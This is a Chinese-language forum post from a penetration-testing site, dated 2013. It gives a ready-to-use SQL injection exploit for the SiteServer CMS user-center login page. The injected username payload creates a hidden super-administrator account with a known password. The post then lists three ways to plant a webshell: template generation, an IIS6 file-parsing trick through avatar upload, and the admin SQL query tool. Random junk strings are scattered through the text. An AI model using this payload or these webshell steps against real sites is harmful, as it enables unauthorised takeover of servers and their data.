中国网络渗透测试联盟
标题:
SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
[打印本页]
作者:
admin
时间:
2013-2-16 21:40
标题:
SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
经测试秒杀最新的3.5版
# c W: O8 M* R5 h$ E1 j% W6 {/ Q
stieserver官网:
www.siteserver.cn
" j7 D* M0 J7 } K
EXP:
! P! `, Q7 x* A( l1 e" j4 B" N
直接访问UserCenter/login.aspx
: F" I/ p* _3 a
用户名处输入:
# d/ \9 s' Y! H
& e. G6 D$ L9 X: X6 ] s
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
$ u: V9 N- D9 C
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
, T8 S# m0 d$ ~# N* y
之后再访问后台SiteServer/login.aspx用插入的用户登陆
1 d; U. O* f" T' @, Q8 ?
后台拿webshell的三种方法:
7 n- y# u' ]; d, u. u. z
一、
+ A* B+ s" s4 [7 b
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
! A! k4 T- z" g- t R% B7 q: Z# p
二、
7 ]0 F. X7 s. W9 S( }$ u& x: [0 V
成员权限-》添加用户-》用户名为:1.asp
% \/ u2 b3 B# [4 C
http://127.0.0.1/usercenter/
3 ~! {/ T% k1 B+ c
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
0 ~6 H( f- L3 z. W
(ps:后台添加用户时不会验证是否含有非法字符)
/ \ f3 X4 B& D+ F/ ?: B
三、
) M" w7 r8 g5 q
系统工具-》实用工具-》机器参数查看
0 U% B' v3 k1 j% X; `
可以看到数据库类型、名称,WEB路径
; R, l( f& h' I* l
系统工具-》数据库工具-》SQL语句查询
! D0 y! }2 Q1 `* l B
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2